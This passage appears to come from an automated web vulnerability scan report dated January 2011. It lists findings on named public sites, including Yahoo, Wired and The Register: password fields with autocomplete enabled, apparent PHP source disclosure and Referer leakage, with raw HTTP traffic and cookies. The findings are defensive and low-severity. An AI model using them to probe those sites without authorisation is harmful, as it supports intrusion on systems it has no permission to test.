User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.5. https://edit.yahoo.com/registration previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://edit.yahoo.com
Path:	/registration

Issue detail

The page contains a form with the following action URL:

https://edit.yahoo.com/registration

The form contains the following password fields with autocomplete enabled:

password
passwordconfirm

Request

GET /registration?.src=fpctx&.intl=us&.done=http://www.yahoo.com/ HTTP/1.1
Host: edit.yahoo.com
Connection: keep-alive
Referer: http://www.yahoo.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=80eipqp6i4psl&b=3&s=j8

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 22:45:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 50154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<t
...[SNIP]...

<form id="regFormBody" name="regFormBody" action="/registration" method="post">

<input type="hidden" id="parentreg" name=".parentreg" value="">
...[SNIP]...
<div class="collection">
<input type="password" name="password" id="password" value="" size="32" maxlength="32" class="">
<div id="meter_tag">
...[SNIP]...
<div class="collection">
<input type="password" name="passwordconfirm" id="passwordconfirm" value="" size="32" maxlength="32" class="">
</div>
...[SNIP]...

12.6. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.theregister.co.uk
Path:	/forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL:

http://account.theregister.co.uk/login/

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:02:26 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 46429

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<
...[SNIP]...
</p>
<form method=POST action="http://account.theregister.co.uk/login/">
<input type=hidden name=r value="http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/">
...[SNIP]...
</span>
<input class=text type=password name=password></label>
...[SNIP]...

12.7. http://forums.theregister.co.uk/forum/1/2011/01/07/open_source_crypto_curbs/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://forums.theregister.co.uk
Path:	/forum/1/2011/01/07/open_source_crypto_curbs/

Issue detail

The page contains a form with the following action URL:

http://forums.theregister.co.uk/post/submit/2011/01/07/open_source_crypto_curbs/

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.8. http://lists.arin.net/mailman/listinfo/arin-whoisrws previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://lists.arin.net
Path:	/mailman/listinfo/arin-whoisrws

Issue detail

The page contains a form with the following action URL:

http://lists.arin.net/mailman/subscribe/arin-whoisrws

The form contains the following password fields with autocomplete enabled:

pw
pw-conf

Request

GET /mailman/listinfo/arin-whoisrws HTTP/1.1
Host: lists.arin.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.9. http://whitepapers.theregister.co.uk/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://whitepapers.theregister.co.uk
Path:	/

Issue detail

The page contains a form with the following action URL:

http://account.theregister.co.uk/login/

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.10. http://whitepapers.theregister.co.uk/search/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://whitepapers.theregister.co.uk
Path:	/search/

Issue detail

The page contains a form with the following action URL:

http://account.theregister.co.uk/login/

The form contains the following password field with autocomplete enabled:

password

Request

GET /search/ HTTP/1.1
Host: whitepapers.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.11. http://www.43things.com/person/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.43things.com
Path:	/person/

Issue detail

The page contains a form with the following action URL:

http://www.43things.com/auth/login

The form contains the following password field with autocomplete enabled:

person[password]

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.12. http://www.admob.com/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.admob.com
Path:	/

Issue detail

The page contains a form with the following action URL:

https://www.admob.com/home/login/login

The form contains the following password field with autocomplete enabled:

password

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.13. http://www.connect.facebook.com/widgets/fan.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.connect.facebook.com
Path:	/widgets/fan.php

Issue detail

The page contains a form with the following action URL:

https://login.connect.facebook.com/login.php?login_attempt=1

The form contains the following password field with autocomplete enabled:

pass

Request

GET /widgets/fan.php HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x25; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Wed, 12 Jan 2011 04:27:30 GMT
Content-Length: 11326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://login.connect.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="€,´,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.14. http://www.sentinelinvestments.com/advisor-login previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.sentinelinvestments.com
Path:	/advisor-login

Issue detail

The page contains a form with the following action URL:

http://www.sentinelinvestments.com/inc/form_scripts/advisor_login_script.php

The form contains the following password field with autocomplete enabled:

password

Request

Response

12.15. http://www.tukaiz.com/index.php previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tukaiz.com
Path:	/index.php

Issue detail

The page contains a form with the following action URL:

http://www.tukaiz.com/index.php

The form contains the following password field with autocomplete enabled:

passwd

Request

GET /index.php HTTP/1.1
Host: www.tukaiz.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13. Source code disclosure previous next
There are 5 instances of this issue:

http://www.addthis.com/bookmark.php
http://www.websitedescription.com/msn.whitepages.com
http://www.wired.com/magazine/
http://www.wired.com/magazine/ipad
http://www.wired.com/playbook/

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

13.1. http://www.addthis.com/bookmark.php previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.addthis.com
Path:	/bookmark.php

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /bookmark.php HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.2. http://www.websitedescription.com/msn.whitepages.com previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.websitedescription.com
Path:	/msn.whitepages.com

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /msn.whitepages.com HTTP/1.1
Host: www.websitedescription.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 15:26:52 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.3.2
Connection: close
Content-Type: text/html
Content-Length: 29956

<?php include 'include.php'; ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<
...[SNIP]...

13.3. http://www.wired.com/magazine/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/magazine/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
</li>

<?php wp_get_archives('type=postbypost&limit=10'); ?>
</ul>
<?php include (TEMPLATEPATH . "/most_recent_entries_supplement.php"); ?>
</div>
...[SNIP]...

13.4. http://www.wired.com/magazine/ipad previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/magazine/ipad

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /magazine/ipad HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

13.5. http://www.wired.com/playbook/ previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.wired.com
Path:	/playbook/

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /playbook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

14. Referer-dependent response previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.crwdcntrl.net
Path:	/4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defenses are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=ctst; Domain=.crwdcntrl.net; Path=/
Location: http://ad.crwdcntrl.net/4/ct=y|ref=http%253A%252F%252Fwww.wired.com%252Fthreatlevel%252F2011%252F01%252Fwikileaks-sunken-treasure%252F|to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

Request 2

GET /4/to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454 HTTP/1.1
Host: ad.crwdcntrl.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 302 Moved Temporarily
Date: Wed, 12 Jan 2011 03:00:25 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Set-Cookie: cc=ctst; Domain=.crwdcntrl.net; Path=/
Location: http://ad.crwdcntrl.net/4/ct=y|to=y%7Cp=1685%7Cvar=CN.ad.lotame.tags%7Cout=json?_=1294610289454
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

15. Cross-domain Referer leakage previous next
There are 5 instances of this issue:

http://account.theregister.co.uk/register/
http://ad.uk.doubleclick.net/adj/reg.security.4159/front
https://edit.yahoo.com/registration
http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml
http://www.wired.com/js/global.js

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

15.1. http://account.theregister.co.uk/register/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://account.theregister.co.uk
Path:	/register/

Issue detail

The page was loaded from a URL containing a query string:

http://account.theregister.co.uk/register/?product=security_news

The response contains the following links to other domains:

http://www.channelregister.co.uk/
http://www.reghardware.com/

Request

GET /register/?product=security_news HTTP/1.1
Host: account.theregister.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 03:12:29 GMT
Server: Apache/2.2.9 (Debian) mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Connection: close
Content-Length: 27098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang=en>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<li>| <a href="http://www.reghardware.com/">Reg Hardware</a>
...[SNIP]...
<li>| <a href="http://www.channelregister.co.uk/">Channel Reg</a>
...[SNIP]...
<li><a href="http://www.channelregister.co.uk/">Channel Register</a>
...[SNIP]...
<li class=last><a href="http://www.reghardware.com/">Register Hardware</a>
...[SNIP]...

15.2. http://ad.uk.doubleclick.net/adj/reg.security.4159/front previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.uk.doubleclick.net
Path:	/adj/reg.security.4159/front

Issue detail

The page was loaded from a URL containing a query string:

http://ad.uk.doubleclick.net/adj/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913?

The response contains the following links to other domains:

http://regmedia.co.uk/2011/01/06/regwa-localflash.html?src='+h+'/1536772/isilon_640x480.swf&gif='+h+'/1536772/isilon_640x480_static.jpg&click=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8d/2/0/%2a/i%3B233459349%3B0-0%3B1%3B13500656%3B255-0/0%3B40103662/40121449/1%3B%3B%7Esscs%3D%3fhttp://info.isilon.com/forms/simpleissmart?source=uk_register_640x480_simpleissmart
http://www.theregister.co.uk/

Request

GET /adj/reg.security.4159/front;tile=1;dcove=d;cta=0;ctb=0;ctc=redesign;sc=1;cid=;test=;pid=111484;pf=0;kw=open%20source;kw=encryption;kw=cryptography;kw=software;kw=export%20administration%20regulations;kw=bureau%20of%20industry%20and%20security;cp=0;vc=sec.front;pos=top;dcopt=ist;sz=728x90;ord=671761913? HTTP/1.1
Host: ad.uk.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc; L1527=1.1294622737145

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 12 Jan 2011 15:25:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 12375

var divid='dclkAdsDivID_19530';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_19530 = "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01//EN\" \"http://www.w3.org/TR/html4/strict.dtd\"><
...[SNIP]...
');

$(function() {
//El Reg Welcome Ad - Reg, LOCAL FLASH script to IFRAME, Jan 2011.

var _REG_WA_displaytime = 18;

var h = 'http://s0.2mdn.net';

var _REG_WA = '<iframe src="http://regmedia.co.uk/2011/01/06/regwa-localflash.html?src='+h+'/1536772/isilon_640x480.swf&gif='+h+'/1536772/isilon_640x480_static.jpg&click=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8d/2/0/%2a/i%3B233459349%3B0-0%3B1%3B13500656%3B255-0/0%3B40103662/40121449/1%3B%3B%7Esscs%3D%3fhttp://info.isilon.com/forms/simpleissmart?source=uk_register_640x480_simpleissmart" width="640" height="480" frameborder="0"></iframe>
...[SNIP]...
<div id="REG_WAClose"><a href="http://www.theregister.co.uk/">Continue to The Register - Skip Ad<span>
...[SNIP]...

15.3. https://edit.yahoo.com/registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://edit.yahoo.com
Path:	/registration

Issue detail

The page was loaded from a URL containing a query string:

https://edit.yahoo.com/registration?.src=fpctx&.intl=us&.done=http://www.yahoo.com/

The response contains the following links to other domains:

https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif
https://s.yimg.com/lq/lib/membership/build/css/registration/221532.css
https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css

Request

Response

HTTP/1.1 200 OK
Date: Tue, 11 Jan 2011 22:45:53 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: private
Connection: close
Content-Type: text/html
Content-Length: 50154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html lang="en-US">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<t
...[SNIP]...
</noscript>
<link href="https://s.yimg.com/lq/lib/membership/build/css/registration/221532.css" type="text/css" rel="stylesheet" />

<style type="text/css">
...[SNIP]...

<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
01817:HEAD/Y=YAHOO/EXP=1294793153/L=ZGOMs0SO8UmAOlnWTSJnlQBCrcHW800s3aEABZA6/B=WL_nNkwNPRY-/J=1294785953482938/K=Bax80.OeEBzKRAFUS1Q2Uw/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...

15.4. http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.pwc.com
Path:	/us/en/issues/cloud-computing/index.jhtml

Issue detail

The page was loaded from a URL containing a query string:

http://www.pwc.com/us/en/issues/cloud-computing/index.jhtml?WT.ac=vt-us-cloud

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://code.jquery.com/jquery-1.4.2.min.js
http://poll.websitegear.com/compactpoll.asp?pollID=16814

Request

GET /us/en/issues/cloud-computing/index.jhtml?WT.ac=vt-us-cloud HTTP/1.1
Host: www.pwc.com
Proxy-Connection: keep-alive
Referer: http://www.pwc.com/us/en/technology/index.jhtml
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LD.previous.visitor.us.pwc.com=true; __utmz=257467274.1294756485.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=price%20waterhouse; __utma=257467274.728746398.1294756485.1294756485.1294756485.1; __utmc=257467274; __utmb=257467274.1.10.1294756485; PWC_WOD=id=173.193.214.243-2605364368.30126492:lv=1294760107159:ss=1294760084820

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Vary: Accept-Encoding
P3P: policyref="http://www.pwc.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMi PUBi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA"
Content-Type: text/html; charset=utf-8
Content-Language: en-US
Date: Tue, 11 Jan 2011 14:34:34 GMT
Connection: close
Content-Length: 21267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<h
...[SNIP]...

<script type="text/javascript" src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
...[SNIP]...
</style>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
...[SNIP]...
</h3>

<script src="http://poll.websitegear.com/compactpoll.asp?pollID=16814" type="text/javascript"> </script>
...[SNIP]...

15.5. http://www.wired.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/js/global.js

Issue detail

The page was loaded from a URL containing a query string:

http://www.wired.com/js/global.js?1103

The response contains the following link to another domain:

http://0/

Request

GET /js/global.js?1103 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 15:11:05 GMT
Date: Wed, 12 Jan 2011 15:01:05 GMT
Connection: close
Content-Length: 37327

//mobify include
var _mm = "http://m.wired.com/";

(function() {
if(document.domain.indexOf("howto.wired.com")>=0) {
return;
}
if(document.domain.indexOf("wired.com")>=0) {

...[SNIP]...
)
document.addEventListener("DOMContentLoaded", init, false);

// for Internet Explorer
/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

16. Cross-domain script include previous next
There are 225 instances of this issue:

http://dean.edwards.name/weblog/2006/03/base/
http://digg.com/submit
http://download.cnet.com/1770-20_4-0.html
http://download.cnet.com/3474-4_4-0.html
